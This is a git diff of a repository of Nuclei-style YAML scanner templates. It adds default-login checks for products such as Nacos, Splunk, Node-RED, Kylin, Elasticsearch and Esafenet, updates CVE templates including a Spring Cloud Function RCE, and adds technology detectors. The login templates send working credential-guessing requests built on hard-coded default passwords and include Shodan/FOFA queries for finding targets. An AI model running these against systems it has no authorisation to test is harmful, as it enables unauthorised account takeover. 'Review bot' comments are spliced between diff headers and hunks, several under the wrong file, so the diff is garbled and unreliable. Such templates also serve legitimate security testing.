4a0a00473045022100bac7ab1c102483005544a8092e8ebf09e74b5e8e497a2619f0aa05b7e4d877640220469c403326592d174fb4d0dc48c2bbba4aba553242fd2ba06bbcf788c29951f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# 
Enhanced by mp on 2022/03/21 diff --git a/poc/cve/cve-2021-24276.yaml b/poc/cve/cve-2021-24276.yaml index b85e96822a..0e7cc9ec1f 100644 --- a/poc/cve/cve-2021-24276.yaml +++ b/poc/cve/cve-2021-24276.yaml @@ -8,10 +8,9 @@ info: reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c - https://nvd.nist.gov/vuln/detail/CVE-2021-24276 - - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-24276 cwe-id: CWE-79 tags: wordpress,cve,cve2021,wp-plugin diff --git a/poc/cve/cve-2022-22963.yaml b/poc/cve/cve-2022-22963.yaml index d04177443d..39a36176e1 100644 --- a/poc/cve/cve-2022-22963.yaml +++ b/poc/cve/cve-2022-22963.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. reference: - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE 
@@ -17,10 +21,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: cve,cve2022,springcloud,rce + cwe-id: CWE-94,CWE-917 + epss-score: 0.97537 + epss-percentile: 0.99993 + cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vmware + product: spring_cloud_function + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware -requests: +http: - raw: - | POST /functionRouter HTTP/1.1 @@ -42,5 +53,4 @@ requests: - type: status status: - 500 - -# Enhanced by mp on 2022/05/19 +# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/default/Mantis-Default_login.yaml b/poc/default/Mantis-Default_login.yaml index 9a5d0f2295..58cb63c201 100644 --- a/poc/default/Mantis-Default_login.yaml +++ b/poc/default/Mantis-Default_login.yaml @@ -6,12 +6,12 @@ info: description: A MantisBT default admin login was discovered. reference: - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - shodan-query: title:"MantisBT" tags: mantisbt,default-login requests: - raw: diff --git a/poc/default/bloofoxcms-default-login.yaml b/poc/default/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..94317594f5 --- /dev/null +++ b/poc/default/bloofoxcms-default-login.yaml 
@@ -0,0 +1,42 @@
+id: bloofoxcms-default-login
+
+info:
+ name: bloofoxCMS - Default Login
+ author: theamanrawat
+ severity: high
+ description: |
+ bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+ reference:
+ - https://www.bloofox.com/automated_setup.113.html
+ - https://www.bloofox.com
+ metadata:
+ verified: "true"
+ max-request: 1
+ fofa-query: "Powered by bloofoxCMS"
+ tags: bloofox,cms,default-login
+
+http:
+ - raw:
+ - |
+ POST /admin/index.php HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}&action=login
+
+ attack: pitchfork
+ payloads:
+ username:
+ - "admin"
+ password:
+ - "admin"
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(body, 'bloofoxCMS Admincenter')
+ - status_code == 200
+ condition: and
+
+# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/dataease-default-login.yaml b/poc/default/dataease-default-login.yaml
new file mode 100644
index 0000000000..de2c5d7694
--- /dev/null
+++ b/poc/default/dataease-default-login.yaml
@@ -0,0 +1,45 @@
+id: dataease-default-login
+
+info:
+ name: Dataease - Default Login
+ author: DhiyaneshDK
+ severity: high
+ description: |
+ Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password.
+ As a result, many Dataease can log in with this built-in account.
+ reference:
+ - https://github.com/dataease/dataease/issues/5995
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"Dataease"
+ tags: default-login,dataease
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/auth/login"
+
+ headers:
+ Content-Type: application/json
+
+ body: |
+ {
+ "username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==",
+ "password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==",
+ "loginType": 0
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"success":true'
+ - '"token":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/default/default-apache-shiro.yaml b/poc/default/default-apache-shiro.yaml
new file mode 100644
index 0000000000..259a94706c
--- /dev/null
+++ b/poc/default/default-apache-shiro.yaml
@@ -0,0 +1,29 @@
+id: default-apache-shiro
+
+info:
+ name: Apache Shiro Default Page
+ author: DhiyaneshDK
+ severity: info
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: title:"Apache Shiro Quickstart"
+ tags: tech,apache,shiro
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Apache Shiro Quickstart"
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/elasticsearch-default-login.yaml b/poc/default/elasticsearch-default-login.yaml
new file mode 100644
index 0000000000..330f016c3d
--- /dev/null
+++ b/poc/default/elasticsearch-default-login.yaml
@@ -0,0 +1,53 @@
+id: elasticsearch-default-login
+
+info:
+ name: ElasticSearch - Default Login
+ author: Mohammad Reza Omrani | @omranisecurity
+ severity: high
+ description: |
+ Elasticsearch default credentials were discovered.
+ reference:
+ - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
+ - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
+ tags: default-login,elasticsearch
+
+http:
+ - raw:
+ - |
+ POST /internal/security/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
+ Referer: {{RootURL}}/login
+ Content-Type: application/json
+ kbn-version: 8.8.2
+ x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
+ Origin: {{RootURL}}
+
+ {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}
+
+ payloads:
+ username:
+ - elastic
+ password:
+ - changeme
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'Set-Cookie: sid='
+ - 'kbn-license-sig:'
+ condition: and
+ case-insensitive: true
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/esafenet-cdg-default-login.yaml b/poc/default/esafenet-cdg-default-login.yaml
new file mode 100644
index 0000000000..93cf1ce1f1
--- /dev/null
+++ b/poc/default/esafenet-cdg-default-login.yaml
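Review bot: The raw request hard-codes `kbn-version: 8.8.2`; Kibana validates this header against its own version and answers 400 ("Browser client is out of date") when they differ, so this template can only succeed against that exact release and stays silent on every other Kibana, including ones still using `elastic:changeme`. The request also goes to Kibana's `/internal/security/login` rather than to Elasticsearch itself, so the name `ElasticSearch - Default Login` and the `elasticsearch` tag are misleading; a line such as `# logs in through the Kibana UI login API; requires Kibana in front of the cluster` would set expectations. The version could be obtained from a preceding GET to `/login` with an internal extractor and referenced in the header, the way splunk-default-login.yaml in this same commit extracts `cval` before posting the login form.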
@@ -0,0 +1,56 @@
+id: esafenet-cdg-default-login
+
+info:
+ name: Esafenet CDG - Default Login
+ author: chesterblue
+ severity: high
+ description: |
+ Esafenet electronic document security management system default credentials were discovered.
+ metadata:
+ verified: true
+ max-request: 32
+ fofa-query: esafenet
+ tags: esafenet,cdg,default-login
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/CDGServer3/SystemConfig"
+
+ headers:
+ content-type: application/x-www-form-urlencoded
+
+ body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
+ attack: clusterbomb
+ payloads:
+ username:
+ - "systemadmin"
+ - "configadmin"
+ - "secadmin"
+ - "docadmin"
+ password:
+ - "Est@Spc820"
+ - "12345678"
+ - "123456"
+ - "Est@Spc2018"
+ - "Est@Spc2019"
+ - "Est@Spc2020"
+ - "Est@Spc2021"
+ - "Est@Spc2022"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "est.connection.url"
+
+ - type: regex
+ part: body
+ regex:
+ - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/feiyuxing-default-login.yaml b/poc/default/feiyuxing-default-login.yaml
new file mode 100644
index 0000000000..dbed124320
--- /dev/null
+++ b/poc/default/feiyuxing-default-login.yaml
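Review bot: The regex matcher `- "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"` is mis-grouped: its top-level alternation is `127.0.0.1` versus `localhost` immediately followed by a private-range prefix, so `localhost` alone never matches and a private address matches only when the literal word `localhost` precedes it; the `10\\.` branch also yields `10..x.y` because the trailing `\\.\\d{1,3}` is appended directly to it. With `matchers-condition: and` this suppresses real hits on hosts whose `est.connection.url` points at a `192.168.x.x` or `10.x.x.x` database, which is presumably the case the matcher was written for. A corrected expression: `- "(127\\.0\\.0\\.1|localhost|(192\\.168|10\\.\\d{1,3}|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3})"`.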
@@ -0,0 +1,51 @@
+id: feiyuxing-default-login
+
+info:
+ name: Feiyuxing Enterprise-Level Management System - Default Login
+ author: SleepingBag945
+ severity: high
+ description: |
+ Attackers can log in through admin:admin, check the system status, and configure the device.
+ reference:
+ - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="飞鱼星企业级智能上网行为管理系统"
+ tags: feiyuxing,default-login,iot
+
+http:
+ - raw:
+ - |
+ POST /send_order.cgi?parameter=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ {"username":"{{username}}","password":"{{password}}"}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"msg":"ok"'
+ - '"type":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'hash_key='
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/kylin-default-login.yaml b/poc/default/kylin-default-login.yaml
new file mode 100644
index 0000000000..cb1fb20d6c
--- /dev/null
+++ b/poc/default/kylin-default-login.yaml
@@ -0,0 +1,55 @@
+id: kylin-default-login
+
+info:
+ name: Apache Kylin Console - Default Login
+ author: SleepingBag945
+ severity: high
+ description: |
+ The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0.
+ reference:
+ - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
+ - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
+ metadata:
+ verified: true
+ max-request: 6
+ fofa-query: app="APACHE-kylin"
+ tags: kylin,default-login,apache
+
+http:
+ - raw:
+ - |
+ GET /kylin/api/user/authentication HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ attack: clusterbomb
+ payloads:
+ username:
+ - ADMIN
+ - admin
+ password:
+ - KYLIN
+ - kylin
+ - 123456
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"userDetails":'
+ - '"username":'
+ - '"password":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/leostream-default-login.yaml b/poc/default/leostream-default-login.yaml
new file mode 100644
index 0000000000..19ff436f70
--- /dev/null
+++ b/poc/default/leostream-default-login.yaml
@@ -0,0 +1,53 @@
+id: leostream-default-login
+
+info:
+ name: Leostream Default Login
+ author: bhutch
+ severity: high
+ description: |
+ Leostream default admin credentials were discovered.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.title:"Leostream"
+ tags: leostream,default-login
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+
+ login_type=0&user={{username}}&password={{password}}&submit=SIGN+IN
+
+ payloads:
+ username:
+ - admin
+ password:
+ - leo
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "Set-Cookie: lld=%21"
+
+ - type: word
+ part: header
+ words:
+ - 'index.pl'
+ - 'server.pl'
+ - 'status.pl'
+ condition: or
+
+ - type: status
+ status:
+ - 302
+
+# digest: 4a0a004730450221009d6b9b830062d1842295e184eb57d4ee56e1f1e4ef08c04432d2b7228f38ab4b02203ad0601a6b79882c8f54b7885cb11581f4eacf1ed0f5323f0b78c6014ad3a761:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/nacos-default-login.yaml b/poc/default/nacos-default-login.yaml
new file mode 100644
index 0000000000..4d14e9d597
--- /dev/null
+++ b/poc/default/nacos-default-login.yaml
@@ -0,0 +1,58 @@
+id: nacos-default-login
+
+info:
+ name: Alibaba Nacos - Default Login
+ author: SleepingBag945
+ severity: high
+ description: |
+ The default username and password for Nacos are both nacos.
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: title=="Nacos"
+ tags: nacos,default-login,alibaba
+
+http:
+ - raw:
+ - |
+ POST /v1/auth/users/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Nacos-Server
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+ - |
+ POST /nacos/v1/auth/users/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Nacos-Server
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - nacos
+ password:
+ - nacos
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"accessToken":'
+ - '"username":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/nodered-default-login.yaml b/poc/default/nodered-default-login.yaml
new file mode 100644
index 0000000000..12548d6fb5
--- /dev/null
+++ b/poc/default/nodered-default-login.yaml
@@ -0,0 +1,51 @@
+id: nodered-default-login
+
+info:
+ name: Node-Red - Default Login
+ author: savik
+ severity: critical
+ description: |
+ Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
+ reference:
+ - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.favicon.hash:321591353
+ tags: default-login,node-red,dashboard
+
+http:
+ - raw:
+ - |
+ POST /auth/token HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+
+ client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - password
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'access_token":'
+ - 'expires_in":'
+ - 'token_type":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/default/pyload-default-login.yaml b/poc/default/pyload-default-login.yaml
new file mode 100644
index 0000000000..b626545bb3
--- /dev/null
+++ b/poc/default/pyload-default-login.yaml
@@ -0,0 +1,46 @@
+id: pyload-default-login
+
+info:
+ name: PyLoad Default Login
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ PyLoad Default Credentials were discovered.
+ reference:
+ - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20.
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"pyload"
+ tags: default-login,pyload
+
+http:
+ - raw:
+ - |
+ POST /login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ do=login&username={{username}}&password={{password}}&submit=Login
+
+ payloads:
+ username:
+ - pyload
+ password:
+ - pyload
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'Set-Cookie: pyload_session='
+ - '/dashboard'
+ condition: and
+
+ - type: status
+ status:
+ - 302
+
+# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950
diff --git a/poc/default/splunk-default-login.yaml b/poc/default/splunk-default-login.yaml
new file mode 100644
index 0000000000..8afecbbefe
--- /dev/null
+++ b/poc/default/splunk-default-login.yaml
@@ -0,0 +1,69 @@ +id: splunk-default-login + +info: + name: Splunk - Default Password + author: pussycat0x + severity: high + description: | + Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: http.title:"Splunk" + tags: default-login,splunk + +http: + - raw: + - | + GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + - | + POST /en-US/account/login HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{BaseURL}} + + {{cval}}&username={{username}}&password={{password}}&return_to=%2Fen-US%2F&set_has_logged_in=false + - | + GET /en-US/splunkd/__raw/services/server/health/splunkd?output_mode=json&_= HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - "admin" + - "splunk" + - "root" + password: + - "admin" + - "splunk" + - "toor" + + stop-at-first-match: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "splunkd" + - "updated" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + internal: true + name: cval + part: header + regex: + - 'cval=([0-9]+)' +# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/4D-detect.yaml b/poc/detect/4D-detect.yaml index 33d6117a38..094712f06e 100644 --- a/poc/detect/4D-detect.yaml +++ b/poc/detect/4D-detect.yaml 
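Review bot: The info block has no `reference` entry, unlike every other default-login template in this commit, so a reader cannot see where the credential pairs or the `cval` login flow come from; add a `reference:` list pointing at Splunk's documentation on the initial administrator password (URL to be supplied by the author). The description is generic boilerplate; `Splunk Web accepted one of the listed default credential pairs and the resulting session could read the splunkd health endpoint.` describes the check. The final `status` matcher has no `part`, so it presumably applies to the last response, the same one `body_3` inspects; a short comment saying so avoids a reader mistaking the 200 on the login page for the signal.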
@@ -10,8 +10,8 @@ info: - https://doc.4d.com/4Dv18/4D/18.4/URLs-and-Form-Actions.300-5232844.en.html - https://doc.4d.com/4Dv18/4D/18.4/Information-about-the-Web-Site.300-5232828.en.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"4DACTION/" tags: 4D,detect,tech @@ -44,4 +44,4 @@ http: group: 1 regex: - 'Server:\s+4D(?:_V[0-9]+)?/([0-9.]+)' -# digest: 4a0a00473045022015e3c4a42238602221b5c8c9705997a09295140001b69bc7f96add5bf8d2bb29022100ea291331d1cd6e98dd0439ca096c434691cd400c010705fd357b7378d9cfd11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/bamboo-detect.yaml b/poc/detect/bamboo-detect.yaml new file mode 100644 index 0000000000..b4cf9aa185 --- /dev/null +++ b/poc/detect/bamboo-detect.yaml @@ -0,0 +1,35 @@ +id: bamboo-detect + +info: + name: Bamboo - Detection + author: bhutch + severity: info + description: | + Detect the presence of Bamboo, a CI/CD tool. + metadata: + verified: true + max-request: 1 + vendor: atlassian + shodan-query: http.favicon.hash:-1379982221 + category: devops + tags: tech,bamboo,atlassian,detect,cicd + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + matchers: + - type: dsl + dsl: + - contains(to_lower(body), "log into atlassian - atlassian bamboo") + - contains(to_lower(body), "meta name=\"application-name\" content=\"bamboo\" />") + + extractors: + - type: regex + name: version + group: 1 + regex: + - '(?i)atlassian bamboo version (.*) -' +# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
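Review bot: The version extractor `(?i)atlassian bamboo version (.*) -` uses a greedy `(.*)`, so if the footer contains more than one ` - ` separator after the version the capture runs past the version number into the build information; `([0-9][0-9a-z.]*)` keeps the capture to the version token. The two DSL expressions have no explicit `condition`, which I believe defaults to `or`; that is probably intended (login page or meta tag), but an explicit `condition: or` makes it clear to readers coming from the sibling detect templates that spell it out.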
diff --git a/poc/detect/burp-collaborator-detect.yaml b/poc/detect/burp-collaborator-detect.yaml new file mode 100644 index 0000000000..c63c2ce4f1 --- /dev/null +++ b/poc/detect/burp-collaborator-detect.yaml @@ -0,0 +1,44 @@ +id: burp-collaborator-detect + +info: + name: Burp Collaborator Server - Detect + author: lum8rjack + severity: info + description: | + Burp Collaborator server detected. + reference: + - https://portswigger.net/burp/documentation/collaborator + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: "Server: Burp Collaborator" + tags: burp,tech,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Server: Burp Collaborator https://burpcollaborator.net/" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + group: 1 + regex: + - "(?:X-(Collaborator-Version: [0-9]))" + +# digest: 4b0a00483046022100f9470eae136929c08d076b3d7cb40c182a6c6bc4da1a7c9169bbc8ce9d354063022100f9973d7a77162a39c2deaf779a2409b0ae4d95fb2ba9203794827aca3a3f2027:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/casaos-detection.yaml b/poc/detect/casaos-detection.yaml new file mode 100644 index 0000000000..a4cd8658c9 --- /dev/null +++ b/poc/detect/casaos-detection.yaml 
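Review bot: The version extractor regex `(?:X-(Collaborator-Version: [0-9]))` puts the capture group around the header name instead of the value, so `group: 1` yields the text `Collaborator-Version: 4` rather than the version, and the single `[0-9]` truncates anything beyond the first digit. `X-Collaborator-Version: ([0-9.]+)` captures the version value only. Adding `name: version` to the extractor would match the convention used by the bamboo and phplist templates in this commit.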
@@ -0,0 +1,31 @@ +id: casaos-detection + +info: + name: CasaOS Detection + author: pdteam + severity: info + reference: + - https://github.com/IceWhaleTech/CasaOS + metadata: + max-request: 1 + shodan-query: http.html:"/CasaOS-UI/public/index.html" + fofa-query: body="/CasaOS-UI/public/index.html" + tags: casaos,tech,oss + +http: + - method: GET + path: + - "{{BaseURL}}/v1/sys/debug" + + matchers: + - type: dsl + dsl: + - contains(to_lower(body), 'casaos version') + + extractors: + - type: regex + group: 1 + regex: + - CasaOS Version:\s*([0-9.]+) + +# digest: 490a004630440220477bd4b3de6e4497c9e589ce0fe9ee5b0053fd63a04b819d1bed73c6bfb3d93602205b0986e3fab04b5edd5c48b3179839a9aa8f3afa6e345ed2aade3838019a3a6e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/checkpoint-mobile-detect.yaml b/poc/detect/checkpoint-mobile-detect.yaml new file mode 100644 index 0000000000..2019f75869 --- /dev/null +++ b/poc/detect/checkpoint-mobile-detect.yaml @@ -0,0 +1,36 @@ +id: checkpoint-mobile-detect + +info: + name: Check Point Mobile SSL VPN - Detect + author: righettod + severity: info + description: | + Check Point Mobile SSL VPN was detected. + reference: + - https://www.checkpoint.com/quantum/remote-access-vpn/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Check Point Mobile" + tags: panel,checkpoint,detect + +http: + - method: GET + path: + - '{{BaseURL}}/sslvpn/Login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Check Point Mobile' + - 'Check Point Software Technologies' + condition: and + case-insensitive: true + + - type: status + status: + - 403 + +# digest: 4b0a0048304602210096fd8cd25e09a5330a5a44abb2f26ade9700d4445d954f16aaaed67ac566c15f022100f5ad48424d901e210b809d9055b6d2400ce21081e07a55fc8a8fc3bb0a6a2b40:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/chromecast-detect.yaml b/poc/detect/chromecast-detect.yaml new file mode 100644 index 0000000000..af7b1bcb74 --- /dev/null 
